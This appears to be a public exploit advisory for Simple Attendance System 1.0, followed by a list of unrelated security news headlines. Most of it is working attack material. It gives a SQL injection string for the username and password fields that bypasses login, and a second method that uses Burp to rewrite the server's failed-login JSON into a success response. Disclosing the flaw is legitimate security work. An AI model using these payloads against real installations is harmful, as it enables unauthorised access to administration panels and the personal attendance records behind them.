Simple Attendance System version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.
# Exploit Title: Simple Attendance System 1.0 - Authenticated bypass
# Exploit Author: Abdullah Khawaja (hax.3xploit)
# Date: September 17, 2021
# Vendor Homepage: https://www.sourcecodester.com/php/14948/simple-attendance-system-php-and-sqlite-free-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/attendance_0.zip
# Tested on: Linux, windows
# Vendor: oretnom23
# Version: v1.0
# Exploit Description:
Simple Attendance System, is prone to multiple vulnerabilities.
Easy authentication bypass vulnerability on the application
allowing the attacker to login
----- PoC: Authentication Bypass -----
Administration Panel: http://localhost/attendance/login.php
Username: admin' or ''=' -- -+
Password: admin' or ''=' -- -+
----- PoC-2: Authentication Bypass -----
Steps:
1. Enter wrong crendentials http://localhost/attendance/login.php
2. Capture the request in burp and send it to repeater.
3. Forward the request.
4. In response tab, replace :
{"status":"failed","msg":"Invalid username or password."}
with
{"status":"success","msg":"Login successfully."}
Related posts:
3 Critical Software Development Security Trends and Best Practices
Facebook Bans Pakistani and Syrian Hacker Groups for Abusing its Platform
How Cloud Solutions Can Lead to Stronger, More Secure IT Operations
Latest Firefox 95 Includes RLBox Sandboxing to Protect Browser from Malicious Code
Kaspersky releases free tool that scans Linux for known threats